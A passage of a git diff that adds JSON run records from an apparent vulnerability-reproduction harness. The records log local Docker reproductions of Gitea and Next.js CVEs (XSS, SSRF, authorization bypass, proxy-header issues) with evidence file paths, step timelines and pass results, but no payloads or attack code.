"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json"
],
"proof_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
],
"baseline_title": "Gitea Proxy Boundary Fixture",
"proof_title": "Gitea Proxy Boundary Fixture - proof",
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:28:06+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2020-13246"
},
{
"at": "2026-03-18T01:28:06+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-proxy-boundary"
},
{
"at": "2026-03-18T01:28:07+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "browser-replay-before-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:10+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:11+00:00",
"step": "browser-replay-after-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:11+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:28:13+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:28:13+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2020-13246-20260318012806"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "trusted forwarded headers crossed the boundary"
},
{
"name": "browser-present",
"kind": "browser-present",
"passed": true,
"detail": "browser evidence captured"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:28:06+00:00",
"finished_at": "2026-03-18T01:28:13+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd"
}
}

197
08-threat-intel/registry/runs/gitea-gitea--CVE-2021-28378-20260318012813.json 普通文件
查看文件

@@ -0,0 +1,197 @@
{
"run_id": "gitea-gitea--CVE-2021-28378-20260318012813",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2021-28378",
"repro_profile_id": "gitea-xss",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.xss",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json"
}
],
"browser_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
],
"browser_evidence": {
"required": true,
"present": true,
"refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json"
],
"proof_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
],
"baseline_title": "Gitea Stored XSS Fixture",
"proof_title": "Gitea Stored XSS Fixture - proof",
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:28:13+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2021-28378"
},
{
"at": "2026-03-18T01:28:13+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-xss"
},
{
"at": "2026-03-18T01:28:13+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:28:16+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:28:16+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:28:16+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:16+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:28:17+00:00",
"step": "browser-replay-before-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:17+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:18+00:00",
"step": "browser-replay-after-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:18+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:28:19+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:28:19+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2021-28378-20260318012813"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "stored payload rendered inside the browser proof page"
},
{
"name": "browser-present",
"kind": "browser-present",
"passed": true,
"detail": "browser evidence captured"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:28:13+00:00",
"finished_at": "2026-03-18T01:28:19+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd"
}
}

145
08-threat-intel/registry/runs/gitea-gitea--CVE-2025-68940-20260318012708.json 普通文件
查看文件

@@ -0,0 +1,145 @@
{
"run_id": "gitea-gitea--CVE-2025-68940-20260318012708",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2025-68940",
"repro_profile_id": "gitea-authz-bypass",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.authz-bypass",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json"
}
],
"browser_refs": [],
"browser_evidence": {
"required": false,
"present": false,
"refs": [],
"baseline_refs": [],
"proof_refs": [],
"baseline_title": null,
"proof_title": null,
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:27:08+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2025-68940"
},
{
"at": "2026-03-18T01:27:08+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-authz-bypass"
},
{
"at": "2026-03-18T01:27:08+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:27:12+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:27:12+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2025-68940-20260318012708"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "server-side authorization recheck was bypassed"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:27:08+00:00",
"finished_at": "2026-03-18T01:27:12+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd"
}
}

197
08-threat-intel/registry/runs/nextjs-nextjs--CVE-2020-15242-20260318012830.json 普通文件
查看文件

@@ -0,0 +1,197 @@
{
"run_id": "nextjs-nextjs--CVE-2020-15242-20260318012830",
"system_id": "nextjs",
"advisory_id": "nextjs--CVE-2020-15242",
"repro_profile_id": "nextjs-proxy-boundary",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "nextjs.proxy-boundary",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json"
}
],
"browser_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
],
"browser_evidence": {
"required": true,
"present": true,
"refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json"
],
"proof_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
],
"baseline_title": "Next.js Proxy Boundary Fixture",
"proof_title": "Next.js Proxy Boundary Fixture - proof",
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:28:30+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "nextjs--CVE-2020-15242"
},
{
"at": "2026-03-18T01:28:30+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "nextjs-proxy-boundary"
},
{
"at": "2026-03-18T01:28:31+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "browser-replay-before-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:35+00:00",
"step": "browser-replay-after-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:35+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:28:37+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:28:37+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "nextjs-nextjs--CVE-2020-15242-20260318012830"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "trusted forwarded headers crossed the boundary"
},
{
"name": "browser-present",
"kind": "browser-present",
"passed": true,
"detail": "browser evidence captured"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:28:30+00:00",
"finished_at": "2026-03-18T01:28:37+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd"
}
}

145
08-threat-intel/registry/runs/nextjs-nextjs--CVE-2024-34351-20260318012953.json 普通文件
查看文件

@@ -0,0 +1,145 @@
{
"run_id": "nextjs-nextjs--CVE-2024-34351-20260318012953",
"system_id": "nextjs",
"advisory_id": "nextjs--CVE-2024-34351",
"repro_profile_id": "nextjs-ssrf",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "nextjs.ssrf",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json"
}
],
"browser_refs": [],
"browser_evidence": {
"required": false,
"present": false,
"refs": [],
"baseline_refs": [],
"proof_refs": [],
"baseline_title": null,
"proof_title": null,
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:29:53+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "nextjs--CVE-2024-34351"
},
{
"at": "2026-03-18T01:29:53+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "nextjs-ssrf"
},
{
"at": "2026-03-18T01:29:53+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:29:57+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:29:57+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "nextjs-nextjs--CVE-2024-34351-20260318012953"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "server-side callback reached the local sink"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:29:53+00:00",
"finished_at": "2026-03-18T01:29:57+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/timeline.mmd"
}
}

145
08-threat-intel/registry/runs/nextjs-nextjs--CVE-2024-51479-20260318012913.json 普通文件
查看文件

@@ -0,0 +1,145 @@
{
"run_id": "nextjs-nextjs--CVE-2024-51479-20260318012913",
"system_id": "nextjs",
"advisory_id": "nextjs--CVE-2024-51479",
"repro_profile_id": "nextjs-authz-bypass",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "nextjs.authz-bypass",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json"
}
],
"browser_refs": [],
"browser_evidence": {
"required": false,
"present": false,
"refs": [],
"baseline_refs": [],
"proof_refs": [],
"baseline_title": null,
"proof_title": null,
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:29:13+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "nextjs--CVE-2024-51479"
},
{
"at": "2026-03-18T01:29:13+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "nextjs-authz-bypass"
},
